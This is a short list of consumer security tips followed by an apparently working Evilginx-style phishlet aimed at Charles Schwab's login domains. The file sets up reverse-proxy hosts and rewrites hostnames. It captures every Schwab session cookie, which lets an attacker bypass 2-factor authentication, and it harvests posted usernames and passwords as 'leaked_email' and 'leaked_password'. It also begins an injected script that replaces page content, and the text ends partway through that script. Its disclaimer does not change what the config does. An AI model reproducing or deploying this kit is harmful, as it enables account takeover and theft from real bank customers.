5 easy ways to protect your assets:
- Enroll in 2-factor authentication
- Sign up for account alerts
- Watch out for phishing emails
- Use biometric options for accessing accounts
- Be aware of latest scam tactics
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. # PLEASE DO NOT MISUSE THIS PHISHLET. author: '@Anon' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'schwab.com', session: true, is_landing: true} - {phish_sub: '', orig_sub: '', domain: 'schwab.com', session: true, is_landing: false} - {phish_sub: 'lms', orig_sub: 'lms', domain: 'schwab.com', session: true, is_landing: false} - {phish_sub: 'client', orig_sub: 'client', domain: 'schwab.com', session: true, is_landing: false} # tags.tiqcdn.com # cempa.instaconnect.cf # chat.instaconnect.cf sub_filters: - {triggers_on: 'www.schwab.com', orig_sub: 'www', domain: 'schwab.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'www', domain: 'schwab.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'www', domain: 'schwab.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: '', domain: 'schwab.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'lms', domain: 'schwab.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'lms', domain: 'schwab.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'lms', domain: 'schwab.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'client', domain: 'schwab.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'client', domain: 'schwab.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.schwab.com', orig_sub: 'client', domain: 'schwab.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} # url = 'https://'+ LMSdomain+ '/Login?ClientId='+ ClientID + '&Region='+ Region + '&RedirectUri='+ 'https://' + ClientBuddy + '/Login/Signon/AuthCodeHandler.ashx'; auth_tokens: - domain: '.schwab.com' keys: ['.*,regexp'] auth_urls: - '/' credentials: username: key: 'leaked_email' search: '(.*)' type: 'post' password: key: 'leaked_password' search: '(.*)' type: 'post' login: domain: 'lms.schwab.com' path: '/Login?ClientId=schwab-secondary&Region=&RedirectUri=https://client.{domain}/Login/Signon/AuthCodeHandler.ashx&StartInSetId=1' # document.getElementsByName("loginIframe")[0].setAttribute("sandbox", "allow-same-origin allow-scripts allow-popups allow-forms"); js_inject: - trigger_domains: ["lms.schwab.com"] trigger_paths: ["/Login"] trigger_params: [] script: | function onclickListener(){ document.body.innerHTML = `